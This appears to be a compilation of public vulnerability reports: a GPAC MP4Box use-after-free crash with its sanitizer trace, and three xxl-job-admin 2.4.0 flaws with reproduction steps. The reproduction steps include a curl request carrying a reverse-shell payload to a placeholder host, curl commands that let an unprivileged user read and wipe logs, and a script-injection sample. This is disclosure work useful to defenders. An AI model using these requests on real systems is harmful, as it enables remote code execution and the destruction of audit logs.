    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

**Asan**

    [33m[iso file] extra box maxr found in hinf, deleting
    [0m[32m[iso file] Unknown box type traI in parent moov
    [0m[33m[iso file] Box "stss" (start 9939) has 32 extra bytes
    [0m[33m[iso file] extra box maxr found in hinf, deleting
    [0m[33m[iso file] Track with no sample description box !
    [0m[33m[IsoMedia] Track 4 type MPEG not natively handled
    [0m[32m[Dasher] No template assigned, using $File$_dash$FS$$Number$
    [0m[32m[iso file] Unknown box type traI in parent moov
    [0m[33m[MP4Mux] muxing unknown codec ID Codec Not Supported, using generic sample entry with 4CC "MPEG"
    [0m[31m[IsoMedia] File truncated, aborting read for track 1
    [0m[37mDashing P1 AS#1.1(V) done (1 segs)
    [0m[31m[MP4Mux] Failed to add sample DTS 0 from O7 - prev DTS 18446744073709551615: Out Of Memory
    [0m=================================================================
    ==836900==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000001d88 at pc 0x7f57c0120bf1 bp 0x7ffeac405a70 sp 0x7ffeac405a68
    READ of size 8 at 0x60b000001d88 thread T0
        #0 0x7f57c0120bf0 in flush_ref_samples /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:936:37
        #1 0x7f57c0128df2 in gf_isom_close_segment /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:2331:4
        #2 0x7f57c0cfd198 in mp4_mux_process_fragmented /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:6734:8
        #3 0x7f57c0cf46f3 in mp4_mux_process /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:7273:14
        #4 0x7f57c09afa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
        #5 0x7f57c097d47b in gf_fs_thread_proc /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2105:3
        #6 0x7f57c097b5cf in gf_fs_run /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2405:3
        #7 0x7f57c022ac6a in gf_dasher_process /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:1236:6
        #8 0x55ff536546dc in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4831:15
        #9 0x55ff53645b6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7
        #10 0x7f57bf229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #11 0x7f57bf229e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #12 0x55ff5356ddd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
    
    0x60b000001d88 is located 104 bytes inside of 112-byte region [0x60b000001d20,0x60b000001d90)
    freed by thread T0 here:
        #0 0x55ff535f0972 in free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f57c001e6f5 in gf_isom_box_del /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:2005:3
    
    previously allocated by thread T0 here:
        #0 0x55ff535f0c1e in malloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105c1e) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f57bff95c5a in trun_box_new /home/user/fuzzing_gpac/gpac/src/isomedia/box_code_base.c:7805:2
        #2 0x7f57c0026335 in gf_isom_box_new /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:1896:9
        #3 0x7f57c0026335 in gf_isom_box_new_parent /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:2351:14
        #4 0x7f57c0d06f05 in mp4_mux_process_sample /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:4915:9
        #5 0x7f57c0cf85a4 in mp4_mux_process_fragmented /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:6653:8
        #6 0x7f57c0cf46f3 in mp4_mux_process /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:7273:14
        #7 0x7f57c09afa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples
    Shadow bytes around the buggy address:
      0x0c167fff8360: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c167fff8370: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c167fff8380: 00 00 00 00 05 fa fa fa fa fa fa fa fa fa 00 00
      0x0c167fff8390: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
      0x0c167fff83a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
    =>0x0c167fff83b0: fd[fd]fa fa fa fa fa fa fa fa fd fd fd fd fd fd
      0x0c167fff83c0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
      0x0c167fff83d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
      0x0c167fff83e0: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
      0x0c167fff83f0: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
      0x0c167fff8400: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==836900==ABORTING
    

**Reproduce****POC File**

https://github.com/gandalf4a/crash\_report/blob/main/gpac/MP4Box/huaf\_936

**Credit**

1 participant

CVE-2023-48011: heap-use-after-free in ./gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples · Issue #2611 · gpac/gpac

xxl-job-admin 2.4.0 is vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save.

**Environment**

MySQL 5.7.44, XXL-Job-Admin 2.4.0  
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)  
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

**Vulnerability Information**

It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.

**Steps to reproduce the behavior**

Step 1: Create a listener  
nc -nlvp 8888  

Step 2: Create a unprivileged user and get its cookie  
  

Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.  
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"  

Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.

CVE-2023-48089: Remote Code Execution in /xxl-job-admin/jobcode/save · Issue #3333 · xuxueli/xxl-job

xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.

**Environment**

MySQL 5.7.44, XXL-Job-Admin 2.4.0  
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)  
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

**Vulnerability Information**

It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.

**Steps to reproduce the behavior**

Step 1: Create a normal user without any privilege inside the web console as below  

Step 2: Retrieve the cookie for the user  

Step 3: Run the following command for testing log query  
 curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'  
  
It can show the successful log query and return 200 status.

Step 4: Run the following command for log clearing  
curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'  
  
it will return 200 status.

Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.

CVE-2023-48087: Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat · Issue #3330 · xuxueli/xxl-job

xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.

**Environment**

MySQL 5.7.44, XXL-Job-Admin 2.4.0  
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)  
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

**Vulnerability Information**

During the query of /xxl-job-admin/joblog/logDetailPage, the xxl-job-admin will query the related log directly in the machine and show it in the console in HTML format even if the log appears in <script> </script> format

**Steps to reproduce the behavior**

Step 1: Modify the application log in default path of XXL-Job-Executor and add malicious javascript  
 cd /data/applogs/xxl-job/jobhandler/yyyy-mm-dd/  
  
Example malicious code  
<script>alert(Test123);</script>  

Step 2: Login to the XXL-Job-Admin console by admin user and navigate to Log Query Page  
Check the log by querying log id  

Step 3: Alert will show here

Tag

#ubuntu